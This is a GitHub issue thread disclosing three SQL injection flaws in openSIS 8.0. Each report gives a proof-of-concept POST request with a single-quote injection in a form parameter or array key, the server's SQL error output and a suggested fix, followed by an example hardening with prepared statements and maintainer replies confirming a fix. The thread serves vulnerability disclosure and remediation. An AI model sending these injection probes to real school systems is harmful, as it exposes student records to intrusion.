
SQL injection in multiple functions #202

Closed
quanhx11 opened this issue Sep 22, 2021 · 5 comments
Labels
Next Release Fix will be provided with the next release

Comments


quanhx11 commented Sep 22, 2021

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/functions/GetStuListFnc.php Grade= parameter
POC

REQUEST

```http
POST /Modules.php?modname=students/AdvancedReport.php&modfunc=&search_modfunc=list&next_modname=students/AdvancedReport.php HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 850
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

last=ad&first=a%CC%81cd&stuid=adc&altid=123&addr=dsca&grade='&section=&w_course_period_id=27&marking_period_id=&activity_id=&absences_term=FY&absences_low=&absences_high=&list_gpa=Y&gpa_term=19&gpa_low=&gpa_high=&cgpa=Y&cgpa_low=&cgpa_high=&month_include_active_date=09&day_include_active_date=01&year_include_active_date=2021&class_rank_term=CUM&class_rank_low=&class_rank_high=&letter_grade_exclude=Y&letter_grade_term=19&letter_grade%5B8%5D=Y&sql_save_session=true&mp_comment=&month_from_birthdate=&day_from_birthdate=&month_to_birthdate=&day_to_birthdate=&goal_title=&goal_description=&progress_name=&progress_description=&med_month=&med_day=&med_year=&doctors_note_comments=&type=&imm_month=&imm_day=&imm_year=&imm_comments=&ma_month=&ma_day=&ma_year=&med_alrt_title=&nv_month=&nv_day=&nv_year=&reason=&result=&med_vist_comments=&address_group=Y
```

RESPONSE

```html
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[...]
<b>SQL:</b></TD>
			<TD>SELECT COUNT(s.STUDENT_ID) AS STUDENT_COUNT  FROM students s ,student_enrollment ssm  LEFT OUTER JOIN student_address sam ON (ssm.STUDENT_ID=sam.STUDENT_ID AND sam.TYPE='Home Address' ) ,schedule w_ss WHERE ssm.STUDENT_ID=s.STUDENT_ID   AND ssm.SYEAR='2023' AND (ssm.START_DATE IS NOT NULL AND ('2021-09-22'<=ssm.END_DATE OR ssm.END_DATE IS NULL)  OR ssm.DROP_CODE=33 )  AND ssm.SYEAR='2023' AND ssm.SCHOOL_ID='1' AND w_ss.STUDENT_ID=s.STUDENT_ID AND w_ss.SYEAR=ssm.SYEAR AND w_ss.SCHOOL_ID=ssm.SCHOOL_ID AND w_ss.COURSE_PERIOD_ID='27' AND ('2021-09-22' BETWEEN w_ss.START_DATE AND w_ss.END_DATE OR w_ss.END_DATE IS NULL) AND NOT EXISTS (SELECT '' FROM student_report_card_grades sg3 WHERE sg3.STUDENT_ID=ssm.STUDENT_ID AND sg3.SYEAR=ssm.SYEAR AND sg3.REPORT_CARD_GRADE_ID IN ('8')AND sg3.MARKING_PERIOD_ID='19' ) AND s.IS_DISABLE IS NULL AND ssm.STUDENT_ID = 'adc'  AND LOWER(s.ALT_ID) LIKE '123%'  AND LOWER(s.LAST_NAME) LIKE 'ad%'  AND LOWER(s.FIRST_NAME) LIKE 'ácd%'  AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=NULL'') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'dsca%' OR LOWER(sam.STATE)='dsca' OR ZIPCODE LIKE 'dsca%')</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Traceback:</b></TD>
			<TD>/var/www/opensis/functions/GetStuListFnc.php at 680</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Additional Information:</b></TD>
			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'd...' at line 1</TD>
		</TR>
[...]
```


SOLUTION

Use function sqlSecurityFilter() before assigning $_REQUEST['grade'] to the query.
The code should look like:

```php
if ($_REQUEST['grade']) {
    // Filter the request value before it is spliced into the query text
    $grade = sqlSecurityFilter($_REQUEST['grade']);
    $allSQL .= ' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=\'' . singleQuoteReplace("'", "\'", $grade) . '\')';
}
```
quanhx11 changed the title from "SQL injection in function GETSTULISTFNC.PHP" to "SQL injection in multiple function" on Sep 22, 2021

quanhx11 commented Sep 22, 2021

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/EditHistoryMarkingPeriods.php, values[new][MP_TYPE]= parameter.

POC:

REQUEST:

```http
POST /Modules.php?modname=grades/EditHistoryMarkingPeriods.php&modfunc=update&tab_id=&mp_id= HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 225
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=eligibility/TeacherCompletion.php&LO_direction=1&portal_search=true&LO_search=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

values[new][MP_'TYPE]=year&values%5Bnew%5D%5BNAME%5D=q&month_values%5Bnew%5D%5BPOST_END_DATE%5D=09&day_values%5Bnew%5D%5BPOST_END_DATE%5D=01&year_values%5Bnew%5D%5BPOST_END_DATE%5D=2021&values%5Bnew%5D%5BSYEAR%5D=2008
```

RESPONSE:

```html
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[...]
		<pre> DB Execute Failed </pre></TD>
		</TR><TR>
			<TD align=right><b>SQL:</b></TD>
			<TD>INSERT INTO history_marking_periods (MARKING_PERIOD_ID, SCHOOL_ID, MP_'TYPE,NAME,SYEAR,POST_END_DATE) values(40, 1, 'year','q','2008','2021-09-01')</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Traceback:</b></TD>
			<TD>/var/www/opensis/modules/grades/EditHistoryMarkingPeriods.php at 92</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Additional Information:</b></TD>
			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''TYPE,NAME,SYEAR,POST_END_DATE) values(40, 1, 'year','q','2008','2021-09-01')' at line 1</TD>
		</TR>

[...]
```

SOLUTION:

Use function sqlSecurityFilter() before foreach variable $_REQUEST['staff'].

`foreach (sqlSecurityFilter($_REQUEST['values']) as $id => $columns)`


quanhx11 commented Sep 22, 2021

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/eligibility/EntryTimes.php, values[STAR'T_DAY]= parameter.

POC:

REQUEST:

```http
POST /Modules.php?modname=eligibility/EntryTimes.php HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

values[STAR'T_DAY]=0&values%5BSTART_TIME%5D=&values%5BEND_DAY%5D=0&values%5BEND_TIME%5D=
```

RESPONSE:

```html
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[...]
		<b>SQL:</b></TD>
			<TD>INSERT INTO program_config (SYEAR,SCHOOL_ID,PROGRAM,TITLE,VALUE) values('2023','1','eligibility','STAR'T_DAY','0')</TD>
		</TR>
		</TR><TR>
<b>Traceback:</b></TD>
			<TD>/var/www/opensis/modules/eligibility/EntryTimes.php at 68</TD>
		</TR><TR>
			<TD align=right><b>Additional Information:</b></TD>
			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'T_DAY','0')' at line 1</TD>
		</TR>
		</TABLE>
		<TABLE CELLSPACING=10 BORDER=0>
[...]
```

SOLUTION:

Use function sqlSecurityFilter() before foreach variable $_REQUEST['values'].

```php
$a = sqlSecurityFilter($_REQUEST['values']);
```
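The three reports above share one root cause: request data is spliced into SQL text, in the first case as a value (grade=) and in the other two as an array key that becomes a column name (values[new][MP_'TYPE]) or a config title (values[STAR'T_DAY]). The following is an added example and not openSIS code; it shows the unsafe concatenation shape beside a hardened form that binds values with PDO prepared statements and allowlists request keys used as identifiers, which placeholders cannot protect. The function names, the ALLOWED_MP_COLUMNS list and the in-memory SQLite database are assumptions for illustration; openSIS's own sqlSecurityFilter()/singleQuoteReplace() helpers are not used here.

```php
<?php
// Added example, not openSIS code. Function names, the allowlist and the
// SQLite demo database are assumptions for illustration.

// Columns that values[new][...] may legitimately set (assumed list; a real
// allowlist must be derived from the application's schema).
const ALLOWED_MP_COLUMNS = ['MP_TYPE', 'NAME', 'SYEAR', 'POST_END_DATE'];

// Unsafe: the request value is spliced into the statement text, which is the
// shape of the query in the first report (grade=' breaks the syntax, and other
// input can change what the query does).
function buildGradeFilterUnsafe(array $request): string
{
    $sql = '';
    if (!empty($request['grade'])) {
        $sql .= " AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title='"
              . $request['grade'] . "')";
    }
    return $sql;
}

// Hardened: emit a placeholder and hand the value back separately; the driver
// sends it out of band, so it can never alter the SQL text.
function buildGradeFilterSafe(array $request, array &$params): string
{
    $sql = '';
    if (!empty($request['grade'])) {
        $sql .= ' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=:grade)';
        $params[':grade'] = (string) $request['grade'];
    }
    return $sql;
}

// Hardened insert for the second report: placeholders cannot bind identifiers,
// so every key of values[new][...] is checked against the allowlist and
// rejected (not escaped) when it does not match; the values are bound.
function insertMarkingPeriod(PDO $db, int $mpId, int $schoolId, array $columns): void
{
    $names = [];
    $placeholders = [];
    $params = [':mp_id' => $mpId, ':school_id' => $schoolId];
    foreach ($columns as $column => $value) {
        if (!in_array($column, ALLOWED_MP_COLUMNS, true)) {
            throw new InvalidArgumentException("Unexpected column: $column");
        }
        $name = ':' . strtolower($column);
        $names[] = $column;
        $placeholders[] = $name;
        $params[$name] = (string) $value;
    }
    $sql = 'INSERT INTO history_marking_periods (MARKING_PERIOD_ID, SCHOOL_ID, '
         . implode(', ', $names) . ') VALUES (:mp_id, :school_id, '
         . implode(', ', $placeholders) . ')';
    $db->prepare($sql)->execute($params);
}

// Demo on an in-memory SQLite database (constructed here; openSIS targets
// MySQL/MariaDB, but the PDO calls are identical).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE history_marking_periods (MARKING_PERIOD_ID INT, SCHOOL_ID INT,'
        . ' MP_TYPE TEXT, NAME TEXT, SYEAR TEXT, POST_END_DATE TEXT)');

$params = [];
echo buildGradeFilterUnsafe(['grade' => "'"]), "\n";        // the quote lands in the SQL text
echo buildGradeFilterSafe(['grade' => "'"], $params), "\n"; // only a placeholder in the SQL text
var_dump($params);                                           // the quote travels as data

// Legitimate keys from the second report's request body are accepted and bound.
insertMarkingPeriod($db, 40, 1, ['MP_TYPE' => 'year', 'NAME' => 'q', 'SYEAR' => '2008', 'POST_END_DATE' => '2021-09-01']);
try {
    insertMarkingPeriod($db, 41, 1, ["MP_'TYPE" => 'year']);  // the malformed key from the second report
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The same split applies to the third report: the value under values[STAR'T_DAY] is bound like any other parameter, and the key itself is either matched against the set of config titles the page is allowed to write or rejected, rather than escaped into the statement.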

quanhx11 changed the title from "SQL injection in multiple function" to "SQL injection in multiple functions" on Sep 23, 2021
@openSISAdmin
Member

Please use the latest code from the repo, not the zip file, and try this. We have committed several updates lately.

@sarika0lal
Contributor

Hello,

We appreciate your observation and would like to inform you that your suggestion has been implemented for the next release.

Thank you.

@sarika0lal sarika0lal added the Next Release Fix will be provided with the next release label Apr 6, 2022
@sarika0lal
Contributor

We released a new version and the issue has been fixed there. Please check and let us know your feedback in case you have any.
